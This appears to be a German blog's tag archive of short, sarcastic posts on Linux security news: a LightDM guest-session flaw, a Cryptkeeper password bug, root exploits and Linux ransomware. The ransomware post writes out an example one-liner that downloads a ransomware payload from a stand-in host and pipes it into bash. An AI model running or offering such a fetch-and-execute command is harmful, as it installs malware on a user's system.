Devuan 1.0.0 LTS ist fertig und kann daungelohdet werden. Wer es haben will, braucht vermutlich keine weitere erläuterung dazu…
Schlagwort-Archive: Linux
„Linux ist sicher“ und unbuntu des tages
Sicherheitslücke im anmeldebildschirm von unbuntu gewährt jedem zugriff auf ihre dateien
[…] „Lightdm“ grenzt die gastbenutzung-sitzung nicht korrekt ein, die standardmäßig in einer ubuntu-installazjon verfügbar ist. Ein angreifer mit fysikalischem zugang zu einem von dieser schwäche betroffenen gerät kann dies ausbeuten, um auf die dateien anderer benutzer auf dem system zuzugreifen, einschließlich der dateien im
home-verzeichnis der benutzer.
Der link geht auf einen englischsprachigen text. Wer die letzten sicherheitsaktualisierungen von unbuntu gezogen hat, ist aus dem schneider, weil die gastsitzungen einfach deaktiviert wurden. Wer noch nicht aktualisiert hat, sollte es jetzt einfach mal tun… 😉
Und nein, der fehler wird nicht gefixt. Das ist unbuntu, da fixt man solche fehler nicht. Da wird einfach die funkzjon abgeschaltet. Wer wirklich gast-logins braucht, könnte dafür allerdings auch einen benutzer mit geringen privilegjen anlegen und mit einem kleinen skriptchen sicherstellen, dass der benutzer jedes mal beim wieder-abmelden (oder bei der anmeldung) „aufgeräumt“ wird.
Hinweis via @benediktg@gnusocial.de.
Da wäxt zusammen, was lang schon zueinander strebt…
Gleich mehrere Linux-Distributionen werden künftig im Windows Store abrufbar sein
Wenn ich jemanden in der öffentlichkeit erwürgen wollte, würde ich auch versuchen, es wie eine innige umarmung aussehen zu lassen…
Und nochmal: security des tages
Da wäxt zusammen, was zusammen gehört…
systemd des tages
Bug des tages
Hat hier jemand das diaspora-paket von debilian benutzt und möchte es jetzt deinstallieren? Vor dem deinstallieren aber besser noch mal aktualisieren, denn sonst gibts rm -rf /bin! 😳
Unbuntu des tages
Tja, das dingens soll man ja auch nicht mit GNOME nutzen, sondern mit canonicals toller unity-oberfläche…
„Linux ist sicher“ des tages
„Mit linux wär das nicht passiert“ des tages
Sehr praktisch, wenn man mal gerade keine root-rechte hat, aber einen rechner administrieren möchte. Nicht, dass hier noch jemand glaubt, in linux gäbe es keine verheerenden sicherheitsprobleme. Dieses ist zum glück gefixt.
Heise und Linux des tages
Firefox soll nicht mehr so leicht ruckeln, wenn Linux große Datenmengen schreibt
<troll>Weia, feierfox-optimierungen im linux-kernel! Muss ja ein tolles betrübssystem mit einer tollen architektur sein…</troll>
„Mit linux wär das nicht passiert“ des tages
Benutzt hier jemand „cryptkeeper“?
Linux encryption app Cryptkeeper has a bug that causes it to use a single-letter universal decryption password: „p“ […] Cryptkeeper … Type „p“ for pwned
Na, gut dass das keiner benutzt hat, der sich auf sein kryptozeug verlassen musste! 
„Mit linux wär das nicht passiert“ des tages
Möchte vielleicht mal jemand auf einem linux-system ein paar dateien mit root-rechten schreiben und hat leider nicht die erforderlichen berechtigungen dafür? Kein problem, das gute alte screen dürfte ja überall installiert sein.
„Mit linux wär das nicht passiert“ des tages
Übrigens ist die überschrift irreführend. Richtiger wäre: „Exploit für einen vor einem jahr gefixten fehler im systemd gefunden, bei dem es etliche distributoren verpasst haben, den gefixten systemd auszuliefern“. Aber ich gebs ja zu, das ist zu lang und würde das lesen des artikels völlig ersparen. So ungern ich persönlich den systemd auch mag, hier haben klar die distributoren gepatzt. Ein jahr lang einen fertigen fix nicht weiterreichen, heißt, den exploit einzuladen.
„Cloud“ des tages
Die bald drei Jahre alte Lücke findet sich demnach hauptsächlich in Mietservern der Cloud
Na, kommt schon, was kann dabei schon schiefgehen?! Wisst ihr eigentlich, ob die ganzen klitschen, die daten von euch haben, diese daten modernerweise in der „cloud“ ablegen? Ist ja so bekwem, wenn man nicht verantwortlich dafür ist und nur ein paar øre miete bezahlt, statt jemanden geld dafür zu geben, dass er sich um sörver kümmert. Macht euch keine illusjonen: verantwortungslose datenschleuderei führt in der BRD niemals zu einer strafe oder gar zu einer haftung für die angerichteten schäden. Das ist nicht einmal eine ordnungswidrigkeit im neuland mit dem großen, großen datenreichtum…
Was habe ich darauf gewartet!
Unter linux gibt es kein ausreichenden softwäjhr-angebot? Das ändert sich. ENDLICH gibt es erpressungstrojaner auch für linux-sörver!!!1!elf!!
Bleibt nur eine offene frage: das ding braucht offensichtlich root-rechte, um sich über GRUB melden zu können. Wie kann man einem linux-sörver einen trojaner unterjubeln. Ich sehe da (bei debianoiden systemen) folgende möglichkeiten:
- PPAs wurden gepwnt. Der admin ist eine schlafmütze und hat PPAs auf einem sörver eingetragen, die dann halbautomatisch sein system mitwarten. (Die alternative ist es, kwelltextpakete nach abgleich der prüfsumme selbst zu kompilieren.) Das bildschirmfoto zeigt einen unbuntu-GRUB, deshalb scheint mir ein PPA gar nicht unwahrscheinlich zu sein.
- Fiese debian-fehler, die bei der unnötigen umstellung des paketmänätschments aufgetreten sind, wurden ausgebeutet.
- Über irgendeine kombinazjon verschiedener „kleiner“ fehler, die ein admin aus furcht vor problemen auch mal völlig ungefixt lässt, kam es zur rechteausweitung und zur ausführung von kohd mit
root-rechten. Etwa, wenn es durch einen fehler in websörver oder in einer darauf laufenden anwendung möglich geworden ist, kohd mit den rechten des websörvers auszuführen, um dann dirty COW zu benutzen, umrootzu kriegen.
Wie es auch sei, eines wirkt dumm an diesem trojaner: warum handelt es sich um die linux-variante eines windohs-schädlings. Gerade ein un*xoides betrübssystem macht es im grunde sehr einfach, einen derartigen trojaner zu schreiben. Sogar die implementazjon in einem shellskript wäre bekwem möglich. Kurz: die leute, die das gemacht haben, sind vermutlich ein bisschen dumm. Dabei braucht nicht einmal eine temporäre datei (die bei einer analyse den privaten schlüssel verraten und eine entschlüsselung ermöglichen könnte) auf einem datenträger abgelegt zu werden, es gibt doch pipes:
# curl -L http://get.ransomware.example.com/?for=some_id | bash
Un*xoide betrübssysteme haben eben ihre ganz eigene eleganz…
Aber: welche schlafmütze von admin hat keine bäckups vom sörver? Oh… 😦
Aber die jagd ist eröffnet. Inzwischen haben ja doch so einige ganz normale anwender ein linux-system als desktoprechner, und viele von ihnen dürften sich sehr sicher fühlen, weil sie ja nicht dieses gefährliche windohs benutzen und deshalb alle vorsicht fahren lassen… da wird die überraschung dann böse, wenn beim hochfahren auf dem bildschirm „gib mir bitcoin, oder du siehst deine daten nie wieder“ steht.
Lasst euch kein antivirus-schlangenöl für linux aufschwatzen! Die scheiße funkzjoniert schon unter windohs nicht und reißt tendenzjell eher noch größere sicherheitslöcher auf. Lernt lieber etwas über den kompjuter, den ihr benutzt, klickt nicht auf alles, was sich anklicken lässt und seht zu, dass ihr immer ein aktuelles system habt. Die beste antivirus-softwäjhr ist das gehirn.
Linux-security des tages
Linux des tages
Linuxnutzer. Das sind die menschen, denen man auf einer webseit für linuxnutzer erklären muss, dass man sich den verwendeten desktop mit ein paar klicki-klicki klicks anpassen kann und wie das geht. Hach, was waren das noch für schöne zeiten, als die mehrzahl der linuxnutzer keine kompjuteranalfabeten waren!
Und ja, in diesen zeiten war es durchaus brauchbarer und nützlicher content, wenn jemand eine kleine einführung in die einrichtung eines FVWM geschrieben hat. (Das dingens war mein liebling, bevor KDE, GNOME und XFCE kamen. Und wenn man keine angst davor hat, sich einen windowmanager mit einem texteditor zu konfigurieren und sich von angestaubten und gereiften konzepten nicht erschrecken lässt, ist FVWM unglaublich gut anpassbar.)
